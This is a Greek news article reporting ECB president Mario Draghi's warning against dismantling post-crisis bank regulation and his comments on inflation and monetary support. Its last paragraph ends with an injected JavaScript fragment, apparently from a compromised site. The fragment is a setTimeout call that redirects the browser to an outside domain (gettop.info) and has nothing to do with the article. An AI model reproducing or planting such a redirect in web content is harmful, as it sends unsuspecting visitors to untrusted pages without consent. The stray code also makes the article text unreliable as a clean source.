Ντράγκι: Το ρυθμιστικό πλαίσιο των τραπεζών δεν πρέπει να ξηλωθεί

0
7

 

Μιλώντας σε συνέδριο στη Φρανκφούρτη ο επικεφαλής της ΕΚΤ Μάριο Ντράγκι, αναφερόμενος στις ανησυχίες ότι ο νέος πρόεδρος των ΗΠΑ θα προχωρήσει σε χαλάρωση των τραπεζικών κανόνων, τόνισε πως τα μέτρα που έχουν αποφασιστεί μετά την κρίση για την ενίσχυση του ρυθμιστικού πλαισίου των τραπεζών διεθνώς δεν θα πρέπει να καταργηθούν.

Όπως σημείωσε ο κ. Ντράγκι το ρυθμιστικό πλαίσιο των τραπεζών πρέπει να εισέλθει σε μία περίοδο σταθερότητας και ότι δεν υπάρχει ανάγκη ανασχεδιασμού των κανόνων, υποστηρίζοντας ότι η υπερβολική απορρύθμιση ήταν η κύρια αιτία της παγκόσμιας χρηματοπιστωτικής κρίσης.

«Το επίκεντρο πρέπει να είναι στην εφαρμογή, όχι σε έναν νέο σχεδιασμό. Τα εποπτικά μέτρα πρέπει να εφαρμοσθούν με έναν ισορροπημένο τρόπο που θα διασφαλίζει ένα αντίστοιχο επίπεδο παγκοσμίως», δήλωσε ο Ντράγκι και συμπλήρωσε: «Και ενώ οριακές προσαρμογές είναι δυνατές, δεν πρέπει να καταργηθούν όσα έχουν αποφασιστεί».

Αναφερόμενος στις προοπτικές για την πολιτική νομισματικής στήριξης της ΕΚΤ, ο κ. Ντράγκι τόνισε ότι εστιάζει στο αν η αύξηση του πληθωρισμού της Ευρωζώνης προς τον στόχο (λίγο κάτω από το 2%) θα μπορεί να διατηρηθεί και μετά από μία μείωση της στήριξης αυτής. «Κοιτάζοντας στο μέλλον, η αξιολόγησή μας θα εξαρτηθεί από το αν θα δούμε μία βιώσιμη προσαρμογή της πορείας του πληθωρισμού προς τον στόχο μας. Και αυτό σημαίνει ότι η πορεία του πληθωρισμού προς το 2% θα συνεχισθεί, ακόμη και μετά από μία μείωση της νομισματικής διευκόλυνσης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here